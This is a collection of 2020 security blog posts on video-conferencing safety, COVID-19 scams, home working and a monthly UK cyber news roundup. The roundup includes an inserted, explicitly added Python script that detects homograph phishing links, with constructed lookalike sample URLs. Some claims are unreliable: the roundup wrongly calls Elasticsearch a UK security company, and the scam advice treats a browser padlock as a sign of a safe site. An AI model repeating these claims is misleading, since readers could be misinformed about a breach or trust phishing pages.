For industries with stringent data privacy and security requirements, platforms like Webex or Microsoft Teams may be a better fit, but every company, platform, and technology has its own set of drawbacks and vulnerabilities. The main takeaway is that every company, regardless of size, needs to have a solid understanding of what its own internal security needs are in order to make an informed decision.

The post Rethinking Zoom? How WebEx, Teams, and Google Meet and Duo Compare on Privacy and Security appeared first on Adam Levin.

How to Keep Your Video Conferencing Meetings Secure

Guest Post by Tom Kellermann (Head Cybersecurity Strategist, VMware Carbon Black)

The sudden and dramatic shift to a mobile workforce has thrust video conferencing into the global spotlight and evolved video conferencing vendors from enterprise communication tools to critical infrastructure.

During any major (and rapid) technology adoption, cyberattackers habitually follow the masses in hopes of launching an attack that could lead to a pay day or give them a competitive advantage. This has not been lost on global organisations’ security and IT teams, who are quickly working to make sure their employees’ privacy and data remains secure.

Here are some high-level tips to help keep video conferencing secure.

Update the Application
Video conferencing providers are regularly deploying software updates to ensure that security holes are mitigated. Take advantage of their diligence and update the app prior to using it, every time.

Lock meetings down and set a strong password
Make sure that only invited attendees can join a meeting. Using full sentences with special characters included, rather than just words or numbers, can be helpful. Make sure you are not sharing the password widely, especially in public places, and never on social media. Waiting room features are critical for privacy, as the meeting host can serve as a final triage to make sure only invited participants are attending. Within the meeting, the host can restrict sharing privileges, leading to smoother meetings and ensuring that uninvited guests are not nefariously sharing materials.

Discussing sensitive information
If sensitive material must be discussed, ensure that the meeting name does not suggest it is a top-secret meeting, which would make it a more attractive target for potential eavesdroppers. Using code words to depict business topics is recommended during the cyber crime wave we are experiencing.

Restrict the sharing of sensitive files to approved file-share technologies, not as part of the meeting itself
Using an employee sharing site that only employees have access to (and that has multi-factor authentication in place) is a great way to make sure sensitive files touch the right eyes only. This should be mandated, as file sharing is a huge Achilles heel.

Use a VPN to protect network traffic while using the platform 
With so many employees working remotely, using a virtual private network (VPN) can help better secure internet connections and keep private information private via encryption. Public WiFi can be a gamble, as it only takes one malicious actor to cause damage. Do not use public WiFi, especially in airports or train stations. Cyber criminals lurk in those locations.

If you can, utilise two networks on your home WiFi router, one for business and the other for personal use.
Make sure that your work computer is only connected to a unique network in your home. All other personal devices – including your family’s – should not be using the same network. The networks and routers in your home should be updated regularly and, again, should use a complex password. Additionally, you should be the only system administrator on your network and all devices that connect to it.

All of us have a role to play in mitigating the cyber crime wave. Please remember these best practices the next time you connect. Stay safe online.

Also related - How Safe are Video Messaging Apps such as Zoom?

Cyber Security Roundup for April 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, March 2020.

The UK went into lockdown in March due to the coronavirus pandemic; these are unprecedented and uncertain times. Unfortunately, cybercriminals are taking full advantage of this situation: both UK citizens and businesses have been hit with a wave of COVID-19 themed phishing emails, and scam social media and text messages (smishing), which prompted warnings by the UK National Cyber Security Centre and UK banks, and a crackdown by the UK Government.
Convincing COVID-19 Scam Text Message (Smishing)

I have not had the opportunity to analyse a copy of the above scam text message (smishing), but it looks like the weblink displayed is not as it appears. My guess is the link is not part of the gov.uk domain, but the attacker has used an internationalised domain name (IDN) homograph attack, namely using foreign font characters to disguise the true address of the malicious website that is linked.
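The kind of check a defender can run on such a link, as an added example that is not part of the original post: it decodes the hostname's IDNA/Punycode form, flags labels that mix scripts (the classic Cyrillic-for-Latin substitution), and confirms whether the registrable host is actually under gov.uk. The trusted suffix list and the sample URLs are constructed for this example.

```python
"""Homograph / lookalike check for links that claim to be gov.uk (added example)."""
import unicodedata
from urllib.parse import urlsplit

# Assumption for this example: the message claims to come from gov.uk only.
TRUSTED_SUFFIXES = ("gov.uk",)


def _script(ch: str) -> str:
    """Rough script classification: the first word of the Unicode character name,
    e.g. 'CYRILLIC SMALL LETTER O' -> 'CYRILLIC', 'LATIN SMALL LETTER G' -> 'LATIN'."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def inspect_link(url: str) -> dict:
    """Decode the hostname's IDNA form and report why it may not be what it looks like."""
    host = (urlsplit(url).hostname or "").rstrip(".")  # urlsplit lower-cases the host
    flags = []
    try:
        # Punycode (xn--) labels are turned back into the Unicode the user sees;
        # Unicode labels are turned into the Punycode the resolver actually uses.
        unicode_host = host.encode("ascii").decode("idna") if host.isascii() else host
        ascii_host = unicode_host.encode("idna").decode("ascii")
    except UnicodeError:
        return {"host": host, "trusted": False, "flags": ["unparseable hostname"]}

    if any(label.startswith("xn--") for label in ascii_host.split(".")):
        flags.append("contains Punycode (non-ASCII) label")

    # A genuine hostname is normally written in a single script; a mix of
    # Latin and Cyrillic letters is the hallmark of a homograph.
    scripts = {_script(c) for c in unicode_host if c.isalpha()}
    if len(scripts) > 1:
        flags.append("mixed scripts: " + ", ".join(sorted(scripts)))

    # Compare the resolver-facing ASCII form, never the pretty Unicode form.
    trusted = any(ascii_host == s or ascii_host.endswith("." + s) for s in TRUSTED_SUFFIXES)
    if not trusted:
        flags.append("not under a trusted domain")

    return {"host": host, "unicode_host": unicode_host, "ascii_host": ascii_host,
            "trusted": trusted, "flags": flags}


# Constructed sample links (not taken from any real message).
SAMPLES = {
    "genuine": "https://www.gov.uk/coronavirus",
    # Cyrillic small letter o (U+043E) standing in for the Latin 'o' in "gov".
    "homograph": "https://www.g\u043ev.uk/coronavirus-rebate",
    # Same trick as a Punycode hostname, plus an ASCII subdomain lookalike.
    "subdomain_lookalike": "https://gov.uk.rebate-example.test/claim",
}

if __name__ == "__main__":
    for name, url in SAMPLES.items():
        result = inspect_link(url)
        print(f"{name:20s} trusted={result['trusted']} flags={result['flags']}")
```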

I was privileged to be on The Telegraph Coronavirus Podcast on 31st March, where I was asked about the security of video messaging apps; a transcript of what I advised is here. Further coronavirus cybersecurity advice was posted on my blog, on working from home securely and to provide awareness of coronavirus themed message scams. It was also great to see the UK payment card contactless limit increased from £30 to £45 to help prevent coronavirus spread.

March threat intelligence reports shone a light on the scale of the cybercriminal shift towards exploiting the COVID-19 crisis for financial gain. Check Point Global Threat Index reported a spike in the registration of coronavirus themed domain names, stating more than 50% of these new domains are likely to be malicious in nature. Proofpoint reports that more than 80% of the threat landscape is using coronavirus themes in some way. There has been a series of hacking attempts directly against the World Health Organisation (WHO), from DNS hijacking to spread a malicious COVID-19 app to a rather weird plot to spread malware through a dodgy anti-virus solution.

Away from the deluge of coronavirus cybersecurity news and threats, Virgin Media were found to have left a database open, which held thousands of customer records exposed, and T-Mobile's email vendor was hacked, resulting in the breach of their customers' and employees' personal data.

International hotel chain Marriott reported 5.2 million guest details were stolen after an unnamed app used by guests was hacked. According to Marriott's online breach notification, stolen data included guest name, address, email address, phone number, loyalty account number and point balances, employer, gender, birthdays (day and month only), airline loyalty program information, and hotel preferences. It was only on 30th November 2018 that Marriott disclosed a breach of 383 million guests. Tony Pepper, CEO at Egress, said: “Marriott International admitted that it has suffered another data breach, affecting up to 5.2 million people. This follows the well-documented data breach highlighted in November 2018 where the records of approximately 339 million guests were exposed in a catastrophic cybersecurity incident. Having already received an intention to fine from the ICO to the tune of £99m for that, Marriott will be more than aware of its responsibility to ensure that the information it shares and stores is appropriately protected. Not only does this news raise further concerns for Marriott, but it also serves as a reminder to all organisations that they must constantly be working to enhance their data security systems and protocols to avoid similar breaches. It will be interesting to see if further action is taken by the ICO.”

Five billion records were found to be exposed by UK security company Elasticsearch. Researchers also found an Amazon Web Services open MongoDB database of eight million European Union citizen retail sales records was left exposed, which included personal and financial information. And Let’s Encrypt revoked over 3 million TLS certificates due to a bug in certificate rechecking.

March was another busy month for security updates: Patch Tuesday saw Microsoft release fixes for 116 vulnerabilities and there was an out-of-band Microsoft fix for the 'EternalDarkness' bug on 10th March, but a zero-day exploited vulnerability in Windows remained unpatched by the Seattle-based software giant. Adobe released a raft of security patches, as did Apple (over 30 patches), Google, Cisco, DrayTek, VMware, and Drupal.

Stay safe, stay home and watch for the scams.


      How Safe are Video Messaging Apps such as Zoom?

      I was privileged to be part of The Telegraph Coronavirus Podcast today, where I was asked about the security of video messaging apps.



      'How safe are video messaging apps such as Zoom, and what should users bear in mind when using them?'

      My reply...
      Video messaging apps are an essential communication tool for at home and within businesses, especially during the COVID-19 lockdown period. They are generally safe to use but there are a few security risks which users should be aware of.

      Our increased use of video messaging apps has not gone unnoticed by cybercriminals, who are seeking to exploit the increase of use by sending phishing emails, social media scam messages and even scam text messages, with fake invitations to video messaging app meetings.

      Typically, these scam messages will entice you into either opening a malicious attachment or click a web link which directs to a malicious website. The ultimate aim of these cyberattacks is to deliver malicious software, such as ransomware which locks your PC and demands a ransom payment to unlock, scam a payment, or steal your personal information which can be resold to other cybercriminals on the dark web.

      So, never open an attachment or click on any links within any unexpected or suspicious emails, social media messages and text messages.

      The next piece of advice is to ensure your video messaging app is always kept up-to-date. Luckily most modern smartphones and computer operating systems will automatically update your apps, but it is always worth double-checking and not to suppress any app updates from occurring, as often the app updates are fixing security flaws.

      And finally, on home computers and laptops, when not using video messaging apps, either cover your webcam with a piece of tape or face your webcam towards a wall or ceiling, just in case your computer is covertly compromised and a malicious actor gains access to your computer's webcam.


      Additional
      One tip I didn't have time to mention on the podcast: always ensure your video chats are set to private, using a strong password to prevent ZoomBombing. Recent reports have shown a series of “Zoombombing” incidents lately, where unwanted guests have joined in on open calls.

      Bharat Mistry, Principal Security Strategist at Trend Micro, advises on Zoom: “Although not alone in being targeted, Zoom has been the subject of some of the highest-profile incidents so far this year. Fortunately, there are things you can do to keep your business safe.

      It’s all about taking advantage of unsecure settings in the app, (and possibly using brute-force tools to crack meeting IDs). With access to a meeting, hackers could harvest highly sensitive and/or market-critical corporate information, or even spread malware via a file transfer feature.

      Hackers know users are looking en masse for ways to communicate during government lockdowns. By creating legitimate-looking Zoom links and websites, they could steal financial details, spread malware or harvest Zoom ID numbers, allowing them to infiltrate virtual meetings. One vendor discovered 2,000 new domains had been registered in March alone, over two-thirds of the total for the year so far.

      Risk mitigation:
      The good news is that there are several things you can do to mitigate the security risks associated with Zoom. The most basic are: 
      • Ensure Zoom is always on the latest software version
      • Build awareness of Zoom phishing scams into user training programmes. Users should only download the Zoom client from a trusted site and check for anything suspicious in the meeting URL when joining a meeting
      • Ensure all home workers have anti-malware including phishing detection installed from a reputable vendor
      Organisational preparedness:
      Next, it’s important to revisit those administrative settings in the app, to reduce the opportunities for hackers and Zoombombers. Fortunately, automatically generated passwords are now switched on by default, and the use of personal meeting IDs is switched off, meaning Zoom will create a random, one-off ID for each meeting. These settings should be kept as they are. But organisations can do more, including:
      • Ensure you also generate a meeting ID automatically for recurring meetings
      • Set screen-sharing to “host only” to prevent uninvited guests from sharing disruptive content
      • Don’t share any meeting IDs online
      • Disable “file transfers” to mitigate risk of malware
      • Make sure that only authenticated users can join meetings
      • Lock the meeting once it’s started to prevent anyone new joining
      • Use waiting room feature, so the host can only allow attendees from a pre-assigned register
      • Play a sound when someone enters or leaves the room
      • Allow host to put attendees on hold, temporarily removing them from a meeting if necessary”

      Working from Home Cybersecurity Guidance


      Working from home comes with a range of security risks, but employees need to be educated too – human behaviour is invariably the weakest link in a company’s cybersecurity posture. In the current environment, with many more employees working at home, cybercriminals are actively looking for opportunities to launch phishing attacks and compromise the IT infrastructure of businesses, large and small. 

      Guidance on Working from Home
      All companies should start by reviewing the home working guidance available at the UK Government’s National Cyber Security Centre (NCSC). This resource helps companies prepare their employees and think about the best way to protect their systems. Crossword has been advising a number of its FTSE clients in a range of sectors, and below is a summary of the guidance given, in addition to that from the NCSC.

      Run Audio and Video calls Securely

      What is visible in the background of your screen during video calls and is someone monitoring who is on the call? The same is true for audio only calls. A team member should be responsible for ensuring only invited guests are present, and calls should be locked once started, so other participants cannot join.

      Educate Employees on Phishing attacks
      The NCSC mentions COVID-19 related Phishing attacks which use the current crisis to trick employees into clicking on fake links, downloading malware, and revealing passwords – so educate them. These could be fake HR notifications or corporate communications; fake tax credits; fake emails from mortgage providers; free meals and mechanisms for registering for them. The list is endless and cyber criminals are very news savvy and quick to adapt. Employees are likely to be more vulnerable to phishing attacks due to people rushing, fear, panic, and urgency; all the behavioural traits that result in successful phishing attacks.

      Automate Virtual Private Network (VPN) configurations
      IT and Security teams may have a backlog of users to set up on VPNs, to provide secure connections to corporate networks. Do not allow employees to send data insecurely, use automation to make accelerated deployments and guarantee correct configuration. Even IT staff are fallible, and the combination of pressure of work volume and working fast, may leave a gaping hole in your infrastructure.

      Control the use of Personal Devices for Corporate Work
      Due to the rapid increase in home workers, many employees may be using their own devices to access emails and data, which may not be covered by Bring Your Own Device (BYOD) policies. In practice, this means that employees’ personal devices may not be securely configured or managed properly, and may be more vulnerable. IT and Security teams, again, may need to retrospectively ensure that employees are complying with BYOD policies, have appropriate endpoint security software installed, etc.

      Stop Personal Email and Unauthorised Cloud Storage Use
      When companies are experiencing IT difficulties in setting up employees working from home, people may be tempted to use personal emails or their personal cloud to send and store data, as a work around. These are a risk and can be easy for cyber criminals to target to gain company information or distribute malware, as they are not protected by the corporate security infrastructure.

      Keep Collaboration Tools Up-to-date
      Tools such as Microsoft Teams, Zoom and Google Hangouts are great, but it is important to ensure all call participants are using the latest versions of the software, and that includes partners and customers that may be on calls. Employees should also only use the corporate approved tools and versions as they will have been tested by security teams for vulnerabilities, that could be exploited by cybercriminals. 

      Stuart Jubb, Consulting Director at Crossword commented: “Throughout the UK, companies are doing everything they can to ensure business continues as normally as possible as the COVID-19 situation develops. The guidance we are issuing today is a summary of the key points we have been discussing with our clients across a wide range of vertical markets. Good IT security measures are arguably more important than ever as companies become a largely distributed workforce, almost overnight. As ever though, it is not just about the technology, but good behaviour and education amongst employees as cybercriminals work to exploit any vulnerability they can find, whether that be a person, mis-configured tech, or unpatched software.”

      Coronavirus Cybersecurity: Scams To Watch Out For

      The Coronavirus pandemic has shocked the world in recent months, with many countries being forced to go into lockdown or encourage its nationals to self-isolate as much as possible. Many are trying to work out how to juggle working from home, caring for their children, managing their finances and looking after their health! But sadly, there’s one more thing you need to add to that list - staying safe online and watching out for scammers. 

      That’s because cybercriminals have decided to take advantage of the global fear, confusion and uncertainty around the world. Plus, vast numbers of people are now working from home and this usually means they are doing so with less cybersecurity measures in place than they would have in their office. 

      Malicious messages examples seen
      • email and social media messages impersonating medical expert bodies including the NHS, World Health Organization (WHO), and Centers for Disease Control and Prevention (CDC), requesting a donation to research a vaccine.
      • GOV.UK themed text messages titled 'You are eligible to get a tax refund (rebate) of 128.34 GBP'
      • messages advertising protective masks and hand sanitisers from bogus websites
      So, despite this being a time when we all need to pull together and help one another out, there are still scammers out there looking to cause trouble. To help keep you safe online, Evalian has compiled a list of four of the most common Coronavirus scams happening right now, so you know what to look out for. 

      1. Phishing Scams 
      This is perhaps the biggest scam out there right now because phishing emails can come in many different forms. Most commonly, hackers are pretending to be health officials or national authorities offering advice about staying safe during the Corona outbreak. The reality is that they are trying to trick unsuspecting individuals into downloading harmful malware or providing sensitive, personal information. 

      Some of these phishing emails look really sophisticated, with one in particular being a fake email sent from the World Health Organisation (WHO), offering tips on how to avoid falling ill with the virus. Once the email user clicks on the link provided, they are redirected to a site that steals their personal information. The problem is, with so many people being genuinely worried about their health and hoping to stop the spread, many don’t suspect that these types of emails could be a scam. 

      The best way to avoid falling victim to these types of phishing emails is to look for suspicious email addresses or lots of spelling mistakes. And even if the email looks pretty legitimate, it might still be worth going direct to the sender’s website instead. For example, going direct to the World Health Organisation website for advice means you can avoid clicking any links from the email. That way you can find the information you need and reduce the risk of falling victim to a cybercrime. 

      Secondly, if an email asks for money or bitcoin donations to help tackle Coronavirus, don’t make any transfers. Again, if you wish to help by donating money or services, go directly to the websites of charities or health organisations to see how you can help.

      It’s also worth noting, that these phishing scams can also be received as a text message or phone call. If you receive strange texts or voicemails asking for donations, giving offers on vaccines or warning you about cases in your local area, approach with caution and certainly don’t give away any of your personal details. 

      2. Fake Websites
      Another common scam designed to play on fear and uncertainty is the setting up of fake websites. Cybercriminals are creating Coronavirus-related websites which claim to offer pharmaceuticals or remedies for the virus such as testing kits, vaccines, and other fake health solutions. The idea is to get anxious victims to part with their bank details or to hack their computer and install malware on their systems. 

      In these situations, there are some things you can do. Firstly, check if the website has a secure connection. You’ll know whether it does or doesn't by the padlock in the address bar. If there is a padlock in the address bar this means the connection to the site is secure; if there isn't, then it’s a good idea to avoid this site. Not only this, but if the website is poorly designed and the text has a lot of spelling and grammatical errors, this could also be a big red flag.

      Finally, it’s also important to be aware that not many sites are genuinely going to be offering these health solutions, and if they appear to be selling in-demand products at an extremely low price, then it’s most likely a scam. Remember, if it seems too good to be true then it probably is.

      3. App Scams 
      Cybercriminals are also targeting smartphones and mobile devices with dedicated Coronavirus apps. These apps claim to track the spread of the virus in your local area and with many people concerned about the proximity of the virus to their home, it’s not surprising that people are willing to download such an app. 

      The reality, however, is that the app then installs malware onto your device and not only compromises your tech, but also all the personal information stored within it. In some cases, the app can lock victims out of their phone or tablet, demanding a ransom to get back in and threatening to delete all the information, contact details and photos stored inside.

      4. Fake Coronavirus Maps
      Last but not least, the fake Coronavirus map scam. Similar to that of the tracking app, cybercriminals have begun circulating graphics of fake maps on which they claim to highlight where all the Coronavirus cases are in your country. These are usually sent round on social media and through email. 

      Of course, these images are not meant to educate or help you in any way. In fact, the scammers include malware in the links so that once you’ve clicked to open the image this immediately infects your device. In most cases, this has been reported to be the kind of bug that can steal data such as bank details, passwords, login information and other sensitive data stored on your device. 

      Look for the Red Flags 
      • Never open attachments or click on links within suspicious or unexpected emails, text and social media messages
      • Look for the suspicious signs; does the message convey a sense of urgency to perform an action?
      • Always remember legitimate organisations never ask for passwords, payment card details and sensitive data to be sent by email
      In these troubling and uncertain times, you’d be forgiven for falling for a scam if you thought for one second it could help to keep you and your family safe from this virus. But sadly, there are criminals out there taking advantage of people’s anxiety. So just be aware that these scams are happening and look out for the red flags we’ve mentioned above to help you stay safe online. 

      UK Payment Card Contactless Limit Increased from £30 to £45 to Prevent Coronavirus Spread

      The contactless payment card limit for in-store card transactions in the UK will be increased from £30 to £45 from 1st April. A good move for preventing COVID-19 spread at supermarkets and petrol stations via card payment pinpads, which are impossible to keep sanitised.

      Better still, everyone right now can benefit from secure MFA contactless payments with higher limits by setting up Apple Pay, Google Pay or Samsung Pay on their smartphone.

      BRC Head of Payments Policy, Andrew Cregan, said: “The last contactless limit increase to £30 took two years to implement but, given the extraordinary circumstances we face today, this new £45 limit will be rolled-out from next week. Some shops will take longer to make the necessary changes, given the strain they’re under. In the meantime, most customers can continue to make contactless payments for higher amounts using their smart phone.”

      Honey, We’re Home! Securing Your Devices and Your Family Bond  


      More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

      Securing family technology

      Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

      Review parental controls. There’s no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child’s digital activity. Too, with a new work-at-home lifestyle, the software (with time limits) can also make scheduling family breaks together much more manageable.

      Secure your home router. Your router is akin to your family’s front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home. If you are reluctant to change your passwords or think it’s a hassle, consider the simplicity of a password manager. Using a password manager makes passwords easy to change and easy to keep track of, which can boost overall security. If you are working from home, make sure your home network aligns with your company’s security expectations. For specifics on business security, read this post on working securely from home.

      Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

      Securing your family bond

      Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

      Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

      Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

      Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life balance, or school-life balance (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don’t forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids teaches them the same value.

      It’s a new frontier, parent, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote, family adventure.

      The post Honey, We’re Home! Securing Your Devices and Your Family Bond appeared first on McAfee Blogs.

      Fake Coronavirus tracking app exploiting our fear and vulnerable social situation

      As the Coronavirus spreads across countries, creating fear across the globe, everybody wants to stay on top of any information related to it, wanting to remain safe and away from infected people. Malware authors are also taking advantage of this situation. Previously on the Android Playstore, there were many applications present which claimed…